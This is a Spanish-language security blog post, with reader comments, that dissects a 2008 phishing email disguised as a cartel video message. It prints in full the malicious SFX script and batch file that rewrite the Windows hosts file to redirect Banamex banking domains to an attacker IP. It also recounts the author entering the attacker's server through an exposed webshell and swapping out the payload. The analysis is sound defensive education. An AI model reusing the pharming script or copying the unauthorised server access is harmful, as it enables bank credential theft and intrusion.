Contenido principal

¿Narcomensaje dirigido al Presidente Felipe Calderon?: Evitando los fraudes electrónicos

Octubre 8, 2008

¿Les resulta familiar? Esta mañana revisando mi correo encuentro un mensaje en la bandeja de SPAM, el mensaje era este:
8 de Octubre 2008
El Narco Lanza Video con un Mensaje Dirigido al Presidente de la Republica.
En este video pueden apreciarse nombres de Altos Mandos de las Fuerzas Federales y Militares Vinculadas con el Crimen Organizado.
En el se le pide formalmente al Presidente de la Republica dejar de apoyar al Cartel de Sinaloa comandado por Joaquín Guzmán Loera "EL Chapo Guzmán" y así detener la ola de ataques dirigidos a la Sociedad.
Al final el video termina con la Siguiente Leyenda "ESTE TERRITORIO SERA NUESTRO ASI TENGAMOS QUE QUITAR GOBIERNOS... ATTE: CARTEL DEL GOLFO"
Click Aqui para ver video Completo. [Link hacía una página]

Si alguna vez recibieron este correo, descargaron el supuesto video y lo vieron, debo decirles que ahora estan infectados.
Aprenderemos a evadir estos tipos de problemas!

¿Quién envió el correo?
Eluniversal.com.mx
Vamos a la página y tomamos un fragmento de los textos de las noticias que publican.
"Explica el Foro Económico Mundial que el país se ubica en la posición 60 del ranking de países ..."
Ahora tomamos varios fragmentos del texto enviado al correo
"En el se le pide formalmente al Presidente de la Republica ..."
"ESTE TERRITORIO SERA NUESTRO ASI ..."
¿Y cuál es la diferencia? R:/ Las tildes.
Es muy importante verificar siempre esto, en este caso una compañia periodística como El Universal, no se puede dar el lujo de no tildar las palabras. Así que a primera vista, el mensaje es FALSO.
"En él se le pide formalmente al Presidente de la República ..."
"ÉSTE TERRITORIO SERÁ NUESTRO ASÍ ...
Punto a favor para sinfocol

Si queremos profundizar más, podemos decirle a nuestro servidor de correos que nos presente una versión original del mensaje (Con cabeceras que envia el mailer)

Acá se puede encontrar el mail original, obviando algunas cosas para no perjudicar al hacker.

Encontramos ésta línea:
Received: from [HOST] ([HOST] [IP])
Donde el servidor nos indica que el correo ha sido enviado de [HOST] identificado con la ip [IP]
El correo ha sido enviado de una [IP] diferente a la IP que identifica el host eluniversal.com.mx [148.243.168.46]
Punto a favor para sinfocol

Línea 43 del archivo SPAM

href="file:///D:/Banking/Scams/Scam/Upload%20Scam/Upload%20Venezuela/Mis%20documentos/Mis%20archivos%20recibidos/letter_files/nuevobnp.css"

¿Scam? http://www.microsoft.com/spain/empresas/asesoria/scam.mspx
"Viene a ser una especie de híbrido entre el phishing y las pirámides de valor. La técnica inicial a través de la cual se inicia o reproduce, y que se considera igualmente estafa o delito, es la llamada “hoax”."
¿Alguién quiere ganar dinero?, pero si no tengo cuenta de banco. Lastima
Punto a favor para sinfocol

Ahora bajamos el supuesto video, y nos encontramos con esto

¿Si será un video original? ¿no debería tener un icono parecido al de un video?

El icono es diferente al de un video, así que es FALSO
Punto a favor para sinfocol

Además, este archivo termina con extensión "exe", lo que nos indica que es un archivo ejecutable, y los que esten familiarizados con el icono del narcomensaje original, saben que es un archivo ejecutable generado por Winrar/Winzip llamado SFX. Si le damos click derecho, vemos que se asocian las opciones del winrar al menú contextual, así que le damos click en "Abrir con WinRar"

Y vemos que el archivo contiene un archivo "bat" y al lado derecho aparece un comentario.

;The comment below contains SFX script commands
Path=.\%windir%\system32\
Setup=narcomensaje.bat
Silent=1
Overwrite=2

Copiara el archivo narcomensaje.bat en la carpeta de sistema, y lo ejecutara en modo silencioso, para que el usuario no se dé cuenta de que algo raro está pasando.

Y el contenido de "narcomensaje.bat" es este

@echo off
echo 200.58.119.91  banamex.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  www.banamex.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  bancanet.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  www.bancanet.com >>; %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  www.bancanetempresarial.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.119.91  boveda.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
start http://mx.youtube.com/watch?v=N6fJpuvr9Pg
exit

Y lo que hace esto, es modificar las dns que apuntan a los dominios allí seleccionados (www.banamex.com, banamex.com bancanet.com ...)
Entonces cuando entremos a cualquiera de estas páginas, en realidad estaremos haciendo petición a algún recurso en la ip 200.58.119.91. Al final abre con el navegador por defecto la dirección en youtube http://mx.youtube.com/watch?v=N6fJpuvr9Pg para que la persona que haya bajado el ejecutable piense que es un video de verdad.
Punto a favor para sinfocol

Pero nos falta más por hacer! Así que nos dirigimos a la dirección donde es descargado el archivo ejecutable

http://XXXXXXX/XXXX/XXX/XXX/XXX/narcomensaje.mpeg.exe

Y no damos click directamente en el ejecutable, sino que intentamos ver que hay en la carpeta donde está alojado el fichero

http://XXXXXXX/XXXX/XXX/XXX/XXX/

Y no vemos nada interesante, solo observamos que se listan los archivos. Así que retrocedemos otro directorio

http://XXXXXXX/XXXX/XXX/XXX/

Y o sorpresa:

Y luego de obtener acceso al servidor, podemos observar los archivos que tienen allí guardados, y vemos el "narcomensaje.mpeg.exe".

Para terminar, subimos un archivo ejecutable generado con Visual Basic, con el siguiente código:

Private Sub Form_Load()
MsgBox "ACABA DE DESCARGAR UN VIRUS. TENGA MAS CUIDADO LA PRÓXIMA VEZ"
End
End Sub

Y reemplazamos al narcomensaje original, por este otro archivo ejecutable

Ahora las personas que abran ese correo y descarguen el "video" verán este mensaje:

Punto a favor para sinfocol

Marcador final
Sinfocol := 6
Hacker := 0
Se puede concluir que el hacker es de méxico, ya que todas las direcciones apuntan hacía dominios mexicanos (mx.youtube.com - eluniversal.com.mx)

Si ya ha ejecutado el archivo, lo único que tiene que hacer es modificar el archivo "hosts" ubicado en la carpeta c:\windows\system32\drivers\etc\, para dejarlo a su estado inicial.

Archivado en: Seguridad |

14 comentarios

  1. Luis Octubre 10, 2008 @ 5:00 am

    La seguridad informática empieza por una buena educación. Pero la gente sigue cayendo en estos trucos...

    Saludos!

  2. RICARDO Octubre 10, 2008 @ 10:25 am

    pues resulta que alguien consulto sus correos en mi PC y me paso lo que comentas con respecto a este asunto, el problema es que se agravo ya que por alguna causa mi antivirus trono y al restablecer la maquina nuevamente mis puertos ethernet quedaron bloqueados, estoy desesperado, sin saber de que forma puedo limpiar mi PC

  3. persefone Octubre 10, 2008 @ 10:17 pm

    nono otra cosa aprendida contigo :), lo pondre en practicaa!!

  4. Sysroot Octubre 10, 2008 @ 10:40 pm

    Luis: El objetivo de la web es precisamente ese, informar y tener buena documentación para que las personas no caigan en trampas, que se estan volviendo muy común en este tiempo.

    Ricardo: Intenta restaurar el sistema. http://support.microsoft.com/kb/306084/es

    Perséfone: Gracias por el apoyo :D

  5. Alberto Nava Octubre 22, 2008 @ 10:25 pm

    Bueno pues si pense que era un virus ya que aparte este mensaje venia con direccion de info.hi5, pero pues la noticia sin lugar a dudas es interesante en estos tiempos, bueno lo descargue y lo intente ejecutar y nada, asi que solo lo elimine. Yo solo que la ventaja es que utilizo ubuntu linux...creo que estoy a salvo

  6. Sysroot Octubre 22, 2008 @ 10:50 pm

    Si estas a salvo, porque el archivo que se descargaba en tal momento, era un archivo con extensión ".bat". El cuál es un archivo que contiene una serie de comandos puestas para ser interpretadas por la línea de comandos. Estos archivos solo son funcionales en windows, así que en linux no debe ocurrir nada. Además en windows se modifica un archivo hosts el cual tiene una ruta fija, claro está, para el sistema windows.
    Saludos, gracias por comentar

  7. Silvia Marzo 18, 2009 @ 7:15 pm

    Es un comentario sobre las tenencias Sr. Presidente con el devido respeto yo le suplico que quite ud. el pago de tenencias compadezcase de los Méxicanos que a duras penas tenemos un carrito que estamos pagando y no tenemos ni para pagar el seguro de auto y mucho menos para la tenencia y no podemos verificar sin pago de esta. Ojalá le agan llegar este mensaje solo ud. nos puede ayudar a los mexicanos. gracias por su comprensión

  8. hecky Abril 12, 2009 @ 4:46 pm

    Que verguenza para nosotros los mexicanos....no no no...aunque acepto que pss no estuvo tan mal esta manera de hacer pharming...y usando ingenieria social, con un tema que a muchos les interesa...Lo que me llamo la atencion es como fue que modifico el archivo??? bueno mas bien como fue que obtuvo acceso al servidor??? ojala me pudiera compartir eso...se me hizo muy interesante

  9. hecky Abril 12, 2009 @ 5:36 pm

    Perdona por poner tantos mensajes pero encontre algo que me llamo la atencion, en la linea 22 del correo dice esto

    Message-ID: <2f33d9ea85fa90772bdabd1f8654a3ea@www.mybabelinks.com>

    Con eso ya es demasiado sospechoso el correo

    bueno me meto a esa pagina para ver...y es una pagina pornografica.

    La cosa no queda ahi si no que de esa pagina se ve todo mal construido y abandonada, pero con contenido, trato de ver el contenido y todo esta caido, entonces veo que del contenido todo esta en un directorio /ct/ y me meto y al meterme me manda a otra pagina (shockehaber.com) y dije ¡por que? entonces me regreso al directorio de /ct/ y detengo la cargada de la pagina para poder ver el codigo fuente y me encuentro con esto

    el titlulo de la pagina es ;

    Cyberabrek Tim HACKED !!! !!

    y usan un meta para refrescar la pagina y reenviarme a shockehaber.com

    Concluyo con que del ID del mensaje por alguna razon tenia la direccion de una pagina pornografica, que curiosamente fue "hackeada" por lo que creo yo un turco.... lo que uno se llega a encontrar...ahora si estoy convencido de que no es oficial el correo jeje :P

  10. Sysroot Abril 13, 2009 @ 3:44 pm

    Jaja es cierto, no me había fijado en el ID del mensaje, pero claramente se ve que no fue enviado de un servidor decente.

    El acceso al servidor fue el siguiente:
    Me compartían un link, que apuntaba a un archivo ejecutable.
    Ese link se encuentra en una carpeta, lo único que hice fue retroceder de carpeta, de la siguiente manera:
    http://www.pagina.com/carpeta1/carpeta2/link.exe :arrow: Tenía esto
    http://www.pagina.com/carpeta1/ :arrow: Y me meto a esto
    Y cuando retrocedí de carpeta me encontre con una webshell, que me daba acceso a todo el servidor.

  11. hecky Abril 13, 2009 @ 9:26 pm

    jeje si estuvo chido eso de la pagina porno hackeada :D

    y del como llegar hasta la webshell si habia entendido, lo que digo es ya en la webshell que hizo para tomar control???

    por cierto ya ni le comente se me hizo una muy buena accion y muy divertido que sustituyera el .sfx de pharming por el codiso de VB. muy buena por usted

  12. Sysroot Abril 13, 2009 @ 10:28 pm

    La webshell es precisamente para tomar el control del servidor, con la webshell se pueden modificar archivos, borrarlos, editarlos, subir archivos, comunicarse con el servidor SQL, entre muchas otras funciones, así que como la webshell ya estaba allí, borré el archivo ejecutable y subí mi propio archivo con el mismo nombre.

  13. hecky Abril 14, 2009 @ 4:33 pm

    mmmm ya veo gracias...no habia escuchado hablar de webshells, solo de shells pero no implementadas en una web

  14. SamuraiBlanco Agosto 8, 2009 @ 6:06 pm

    espero que que le mandaras el ejecutable a las firmas antivirus, asi hago yo :-)

Deja un comentario